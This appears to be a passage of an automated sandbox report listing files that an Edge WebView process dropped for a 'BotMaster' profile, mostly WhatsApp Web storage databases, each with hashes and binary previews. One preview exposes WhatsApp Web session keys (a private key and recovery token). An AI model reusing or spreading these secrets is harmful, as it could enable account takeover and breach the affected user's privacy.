                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000027.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):115
                                                                                                                                                                                                                Entropy (8bit):3.0033788987333265
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:QjCs/ll/lfXn7MloXk7wEOgXlx1ltXn6/R+FXn6/RRgggh:QjCs/lAck7wEOgM/3/Pg/h
                                                                                                                                                                                                                MD5:5E68F1B23A3B39C5BB308EBB77E38ABC
                                                                                                                                                                                                                SHA1:ECBAD6C80AB8D865E5C8ECED3A8315F52E8FCA88
                                                                                                                                                                                                                SHA-256:15EA76E2AE1BC1A8357D19BAF344CDA7863BB8B2311CF1E6147062B7EE314A5D
                                                                                                                                                                                                                SHA-512:82E19323F0C8D55AA985BFBA96C9CE11AE2E55495C556BED0BC0C3B8E6FF26B710B99991AAAB101D71976BCA11A6E93589990160E6A0C6F4A51184FFD6A7D494
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:326J'..i.................2.................2.....4>..k.................2.................2.........................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000028.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):249
                                                                                                                                                                                                                Entropy (8bit):4.4545165514415235
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:UlDBbZjgrsjbOglehVl/171DgijLJnUIR8/AXsEflTlll/q/T:UvhgrC0/DgQG5/AcENTh/q/T
                                                                                                                                                                                                                MD5:D8BD37E7883D8FE719A6B377C61C2F58
                                                                                                                                                                                                                SHA1:C616D9AAB4052B10AB93D057441B952379671C66
                                                                                                                                                                                                                SHA-256:BD48854AF75B0F3AA6DCA4A0FC959D4B51281853522C28FC19B88131A89F042B
                                                                                                                                                                                                                SHA-512:A79458FA861BBB350C058104873E41FCC633892351B00F6C4A4DFDAF6496F36DF0600AB16297C502321F566537B4C33AD12E1BD41681E0658BE663FF79AD2E99
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:l.......2...d................c...............e........f.. ........g..L.....h................q..^.9.".$.............,.'.".filter.leveldb.BuiltinBloomFilter2_.............\.........h.......Z........../x.v/......................................W...$uG.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000029.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10784
                                                                                                                                                                                                                Entropy (8bit):6.6432411595996665
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:qTEiKpNlX7g+0nVdoNZSaqg7G042i5q+dBWnJfjQGX6L9ISXJinpjp26:qTETX7ta/AZSaq8G0Biq+dBW/UAnPN
                                                                                                                                                                                                                MD5:33F5C5B154BB1CDF060166CE1A0F98F9
                                                                                                                                                                                                                SHA1:FB506D9DFFDA3F4DC0679D742F77A988F9AA5956
                                                                                                                                                                                                                SHA-256:8D71BDBBC664BA3E36D7D923F9E5D4A8D4F9CC1DE92156593C590B62BA136828
                                                                                                                                                                                                                SHA-512:811DE95BD38EF30CCEA0A2E1925133D0A2AC41C4BD88ED6AAD43B4E62C90F18689D0E7F3B8BA826523A9A477A3E1FA3F2679C8D045B9F7D347CBB491F8A054C2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$........?.............,.........2...3(.........6.."......D... .r...$.....%.....(.>.j....+.H.........c....2..X............................E.%....D....^..B....\.W...X...h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..w.o.r.k.e.r.-.s.t.o.r.a.g.e.........@.r...........$ .....|.%.". ......f..(_.h.m.a.c._.n.y.s......2..?...{.?.....? 2.......z>.........y>.........x>.........w>.........v>.........u>.........t>.........s......%.$.........g....................f...........e>.......d>.......c>.......b>.......a>....F.....`>&......_>.........^..A....A.....S..1.........$Q*.....!..-....%5................m...?......2..q...........T........%.w..:#....w.....w..:w...2..:w......w...w..(.w...=e.H.........d........<B.........;B.........:B.........aH.o...9.'..8...2.......(..3....&.$..$...s.e.n.d...k.e.y....e.....2.4A..NA....1>..A....0>..A..../>..A.....>..A....->..a....,>..A....+>..a....*..E....a...........5...%.....B..!.....B..!.....B............5~..!~...$:.......)........b.a%..KJ.......01

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000030.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2207
                                                                                                                                                                                                                Entropy (8bit):3.0423382925054883
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:paI9DGOF1XMvfvyL/z/1q/N/8s1elACiKx9LmLWbiSJdilA949re+FVXXX6e:0IdFs3Jf6m3SJAlA49FJX6e
                                                                                                                                                                                                                MD5:FF3CBA0499426989585198A8F6ECD113
                                                                                                                                                                                                                SHA1:661E0675AB24925784D42C94FF29E0A17C7A31EA
                                                                                                                                                                                                                SHA-256:BDB3CB07E04FDC44DE6E917B1EC8A4BB2C8544251E910E9AC8A0E9005BEA99C9
                                                                                                                                                                                                                SHA-512:668D3F8392CFC6C4A1AF0662611981B48C84E04CC0D0E1727FFB30D8F25D262B8FA35D5082A8DAD4C8E88607138D44DB534F061B63BC54EF41E9D5DAD296C839
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.@..'..o.................2.................2........q.................2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. ...............2. Uo..]....................2.$...............2.$...............2.$...............2.$...............2.$u...]....................2.%...............2.%...............2.%...............2.%...............2.%...o...........R.........2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(...............2.(..............

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000031.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):249
                                                                                                                                                                                                                Entropy (8bit):4.356080532890043
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:UlDgVWyNkgQl9i2yGsljMLJnUIR8/AXsEfl5kglS7Q:UOVWngQlIzIG5/AcENqglSk
                                                                                                                                                                                                                MD5:87E58002A6D5733324196FF12C26ADD6
                                                                                                                                                                                                                SHA1:64BB051F703DAE4AEB9721D646FAC22A245BD462
                                                                                                                                                                                                                SHA-256:553C09741F4057557BC5CD5DDB6C5547A4A961054A2572BFAFF8190E76B4E5A0
                                                                                                                                                                                                                SHA-512:3EE2AF76A11BE550EFF04B8525A18F5A3B2E9CD971D1B7C9AE15F9CA5C7AF7C3A7DBFAFD9CA745618ABF99B8E247C7AED8B6E570FBF73E28B727BE6F49FE7C3C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:l.......2...j................i...............k........l.. ........m..L.....n...............N.mG.EEt1...............Q...".filter.leveldb.BuiltinBloomFilter2_.............\.........n.......Z...........c8v/......................................W...$uG.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000032.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10649
                                                                                                                                                                                                                Entropy (8bit):6.630539703509
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:7g62lYg6hu49sOlTzvvwkZ42i5qiTJFq+sfVhj2KiXy4Uw95dTd9Wa:79XyOl3vvwkZBiqiXPX5V
                                                                                                                                                                                                                MD5:4412B3A858E5A8E9BB553FE77F55E449
                                                                                                                                                                                                                SHA1:331E4F93967FBA7F89FB1B3DDCB2D5C65DDFF9B1
                                                                                                                                                                                                                SHA-256:21824DE0E87AD7E5831FB06EA2F3684A3A4C4152C75F47AC0914151B1540FBF4
                                                                                                                                                                                                                SHA-512:5DA7AF70A67B64C702ACA3BA60EE8F56D32417ACF401A0EC53492B5005D045B7D11B8C0B076419EDB7F290337AD72FE03F5564051A324269D41DE3A408A63245
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$........?.............,.........2...3(.........D..".... .r...$.....%.....(.>.^....+.H.........W....@..X..................$ ........|.%.". .......f.t.s._.h.m.a.c._.k.e.y.s.....{.0.....0 2.......z>.........y>.........x>..........2......w>&........v>.........u>.........t>.........s.........$.........g.................f...........e>.......d>.......c>.........b>.......a>.......`>......._>.........^............S..1.........)..$Q!.....'..-....%,................M...?......2..Q...........T........%.w..:#....w.....w..:w...2..:w......w...w..(.w...=iJ(........d..!-...<B.........;B.........:B.........9....8...2.......(..3....&.$..4...s.e.n.d.e.rM.@-.s.t.o.r.e.....2.4A..NA....1>....u_.....0>&.A..../>..A.....>..A....->..A....,>..A....+>..a....*..E....a...........5...%.....B..!.....B..!.....B..!.......5...)..$............b.a%..K..6.......01...!.....>........>....F......>&.!.....>..!.....>..!.....>..!.....>..!.......=.....0.........,%.@..s.i.g.n.e.d.-.pA.R.......<1...!.....i...!.....>..A

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000033.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):123018
                                                                                                                                                                                                                Entropy (8bit):4.757317087298698
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:qBq/YkR7NL5CMwKz/jfEg2XCCWmnKOZUv3:bR7TwKeK
                                                                                                                                                                                                                MD5:30906BD068978268A6991B6D8DB189EF
                                                                                                                                                                                                                SHA1:70D7E72D1B07EB00D225642A8B8A1830CA6B0664
                                                                                                                                                                                                                SHA-256:6DB3C776C791D1B2EB2618D1B2DD55CD967AD232152B16EC1C555E77146EEC0E
                                                                                                                                                                                                                SHA-512:D193DA6914C70C9A60B062225419167F71836BA5492FDE903F2A3FD221D40B48573E0510EEDDEF5B48B145B41CDC77068CBE58077043D573EBA96FF1CF53245C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:%r.p'....................2.+...............2.+]..'.........................U.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..m.o.d.e.l.-.s.t.o.r.a.g.e....................(.7.M..............................2.,.....................2.,......................l.................................2..".p.e.n.d.i.n.g.-.m.u.t.a.t.i.o.n.s......2........i.d......2..........2..........2..........2..........2..........2.....(.......p.e.n.d.i.n.g.-.m.u.t.a.t.i.o.n.s........2.,.........................2.,..................2........2.,..................2........2.,..................2........2.,..................2........2.,..................2........2.,..................2........2.,..................2........2.,..................2........2.,.........,.*.(.......p.e.n.d.i.n.g.-.m.u.t.a.t.i.o.n.s.H9......................2..........d.....i.n.d.e.x......d...........d.........i.n.d.e.x......d...........2.,..................2...........2.,..................d.........2.,..................d.........2.,

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000034.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1191
                                                                                                                                                                                                                Entropy (8bit):5.516233000826044
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:bvR24muvPF3LiBHKcxgW7nIsY7dvsLTXyHA7GPBR:jR2UFLiRrtYyHXiAGz
                                                                                                                                                                                                                MD5:40B2FA99AB830D825E5180E27B8099CC
                                                                                                                                                                                                                SHA1:CB6D1D2EC0D31AEC32C19E49F656965B1A0C9467
                                                                                                                                                                                                                SHA-256:208DE79BDAECF69D4044D9875663902D4DB3DED1226D89FDCB95E8A12FF36360
                                                                                                                                                                                                                SHA-512:333DB399DB6AAA800AA3A6CBC7BAE14244523A7F1CF66290F8845A4AE3BBF68CC5E1FF1FE1B04C35D7D5B33D14C3A1048CB7077486E7047A54A56E1FFD0E689C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.........2...p........ .....$.....%.....(............;...o...... ........q........r.....s.....t.....u.....v.....w.....x.....y.....z.........2......{........|.....}.....~................................................$1................................%.9.................................(.H........................................................................................................................................................................................F.....................................................................................................F.....................................................................................................F.....................................................................................................F...........h....................+. ............... ......................|............a...0..........................H.......h......."......$."..."@..H..@.(.$.......(.$.... ....H..L....l.$.....(((....8.(.......H...J.(

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000035.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8895
                                                                                                                                                                                                                Entropy (8bit):6.571677416765685
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:a02/G2OhDhyviRvtXPmdUPVO4HfvlzGpG6XAnujlS4qC:a02/sxhMSvJHpvl8AVC
                                                                                                                                                                                                                MD5:2D98DBFFC72ED881629D7FAE3C8DC78E
                                                                                                                                                                                                                SHA1:2B2D831E1B1AEB7D759459759FEB258BB7D9771C
                                                                                                                                                                                                                SHA-256:AB4B6AB1ACFAE4A205F487D10D5A5783AFA9D6513026194307CAE6414DB8BEE2
                                                                                                                                                                                                                SHA-512:A1B2C6C6037060E8280619F27EF12AF64F7877B5E76C3EAD7CE3DDFD20D8FE099C1CA3D771688D60D72A045967EBF676566505DAFC5FA05C088D45E6260429AA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$........?.............,.........2...3$.......+.H.......+......D...}.................[....h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..s.i.g.n.a.l.-.s.t.o.r.a.g.e.........:....w.a.w.c..... ..:....w...@._.d.b._.e.n.c.N..#.........7............. ........... ....2......4.l.o.g.s........<....l.i.n.e.....!.........!...(......2....)d....h.).... .........................4.....m.....5.....i...6...v.7.....8...V...[...!.p.:...4...;..........f..4.l.1.0.n.....g.. ....k.e.y...h...y.i........j...........l.......m..............u.s.e.r......6................)h..%h.............y..............)h<._.m.e.t.a.............A.(r.e.a.m.I.d%.... ......1.........w................................m?.........6...............Z)...%.....I........................t.o%..na........6............1.........o......).....................i..'!y.K.aa........6...................g......)...................$..>..:$..%.&^$..&. ...'..1.....(.......)..)..*........{...."...8....w.$a..r1 ...v...t!.....9.....iM..:.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11002
                                                                                                                                                                                                                Entropy (8bit):4.992469618990094
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:jhtU9jVpS6SR3OJIeMBE/NjR2FXhp6RaNgwbOfsCc:jyj/5dqEc
                                                                                                                                                                                                                MD5:B8F8A3F08D4B261ADA488DBEE278A72C
                                                                                                                                                                                                                SHA1:2DC61630A39B0DF327871D21DEC5F5DE3A0A28A5
                                                                                                                                                                                                                SHA-256:CB05A5E01DAEE1841691EF10114037D6F83377CCE1D826963BCACBB388AE9F3F
                                                                                                                                                                                                                SHA-512:A090A61A5A35ADCA81E36433642FEFB3998D125B5B6203F029D94BC7B5B992DFDCED111FC12659C576DD8F92B958DA69A0490C29F421890C5AD7F9EDF69C31A0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:24.736 1d60 Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb since it was missing..2024/03/10-17:46:25.005 1d60 Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb/MANIFEST-000001.2024/03/10-17:46:32.378 1f88 Level-0 table #5: started.2024/03/10-17:46:32.390 1f88 Level-0 table #5: 16318 bytes OK.2024/03/10-17:46:32.393 1f88 Delete type=0 #3.2024/03/10-17:46:32.394 1f88 Manual compaction at level-0 from '\x00\x02\x00\x00\x00' @ 72057594037927935 : 1 .. '\x00\x03\x00\x00\x00' @ 0 : 0; will stop at (end).2024/03/10-17:46:32.406 1f88 Level-0 table #7: started.2024/03/10-17:46:32.427 1f88 Level-0 table #7: 1312 bytes OK.2024/03/10-17:46:32.429 1f88 Delete type=0 #4.2024/03/10-17:46:32.429 1f88 Manual compaction at level-0 from '\x00\x03\x00\x00\x00' @ 72057594037927935 : 1 .. '\x00\x04\x00\x00

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1347
                                                                                                                                                                                                                Entropy (8bit):4.374779038669635
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:ZcNks1PWoziSicstb162LdUzJCmKs9aBOky/bm/BO:ZZhEi3zLKJtKs9am/ic
                                                                                                                                                                                                                MD5:1AD43E53C5D482FE16D2A04E15344132
                                                                                                                                                                                                                SHA1:CA93E829EAAC1BF5F8365CEF79E3D90FD611133F
                                                                                                                                                                                                                SHA-256:1CE054341EDBC0EB78DF3700BDE89900E587666433A3DB40694DB9C762BEC340
                                                                                                                                                                                                                SHA-512:B149D3624A0B3EC48EAB37854F05BF778BFAA2B153E3145FF7A14844BA523EF6F935278FE9868E6F0C42242A26A4C7BF81864BF8C3EE24DDE06A529C31ABF8A9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........idb_cmp1........z.*.............................................8A.*.......................:.............>......*)..@....................>................>............................W}]6*.......................F.............L.......$d.@....................L................>............................9...2.......................M...................?.........PE.P..........................?..................F...........................?.........#..*.......................?.............B.......+1.@....................B................W.....................B.......-CX,.....................2...R.............V......k.~N@....................V................W.....................B..........,.....................2...X.............\..........@....................\................U.....................B......^..U,.....................2...^.............b.........A@....................b................T.....................B......n3i.,.....................2...d.............h......Y)..@..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Local Storage\leveldb\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1492
                                                                                                                                                                                                                Entropy (8bit):6.154250164109757
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:iCWSUlduWespseo3JZWeOflOAFnH/KLf3FT/0ZsxT/0r5WSuz3Ec:iCzicbspseQJZbOLH/evFoZsxor5zuzV
                                                                                                                                                                                                                MD5:475BEB49A5B81CECAE0126AA6528DF4E
                                                                                                                                                                                                                SHA1:ADE1DCA99D0C0E6E854D5ABCE06B7B2E766696A0
                                                                                                                                                                                                                SHA-256:32650C24B0B28AC2208D85ADD0CFB8A895FA6F8483468E204AA9C7CEB00F1C95
                                                                                                                                                                                                                SHA-512:D747FC7F6DFEBB0C3C5F3C5D88BBFBD54E5E13795483C11110C331BCE357AF15D48DA90F9C9E95659A32212BCADA14B526E19B3817B0809C3F86AD8ABD1ED9C9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<c+..................VERSION.1..META:https://www.whatsapp.com............"_https://www.whatsapp.com..Session..1w5j0h:1710089199916.0_https://www.whatsapp.com..__test__1710089174563....................META:https://web.whatsapp.com.............(_https://web.whatsapp.com..dexie_version..3.2.2. _https://web.whatsapp.com..INCOG...X.................META:https://web.whatsapp.com............&_https://web.whatsapp.com..WANoiseInfo...{"privKey":"wSoykUuMOMrPEl3TL4/otK9UvC39P/Cw1BEB4rm6K9U4lrGpYpTMbYth0j4ngBET","pubKey":"AmfwLGVKXHu6qsmk9NrSwv0KlhpkitKAHEuVDGIYXeGByKKcXKetaTnZ3QydYsu4","recoveryToken":"x93p/h7whvvaKLTQv0N4AyN23t7t1iowuBmyKGSGqvo="}.(_https://web.whatsapp.com..WANoiseInfoIvS.["JwDQVEHThQd9un4sPxAXPA==","AdTsOrn+K1wqvKOvpFxx8g==","F6Tf1CeWXIkeX23uyAgvtw=="].*_https://web.whatsapp.com..WAWebEncKeySalt..."GKEkJWlAZjrfAUYP19ac6HuVrJo8tJLzCYnp2x97cMquN0q7SrSQlHTfMdgFnQ8Ay97vCDR0tS9YrugnRK5ydOq+KzHyxoFcF+EpRmFiDFJEHGxGm1fvN24Conkte9efJy/sn1YmN4hJR6JSgcOjdPdTbW3lQMgS476jR2/EE/w=".(_h

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Local Storage\leveldb\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):319
                                                                                                                                                                                                                Entropy (8bit):5.25130932385756
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQVKX1wknaZ5KrWLYQV+d1a2jM8B2KLlvQVqFMM+q2PwknaZ5KrWLYQV+d1a2jMY:SQWrHUd1jFL6oN+vYrHUd1EFUv
                                                                                                                                                                                                                MD5:5E9CC33885B12DF369A7612387CEF49B
                                                                                                                                                                                                                SHA1:36FF873887278AE5F5F6D6F0420F78B7FF257832
                                                                                                                                                                                                                SHA-256:52FCB723706B90DA38BF94E119B68C3029A5074C8D0B5A607C0EF45C2964F3BE
                                                                                                                                                                                                                SHA-512:9A599489E25B433D524AB66CCEF4C8CBC559C78EB3D949F789C606EABF018554BF0A006FE5175BD8B02C799BC95EC50BB54D2A86B130E27605EC2AEE6B46E61F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:02.684 10ac Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Local Storage\leveldb since it was missing..2024/03/10-17:46:02.882 10ac Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Local Storage\leveldb/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Local Storage\leveldb\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
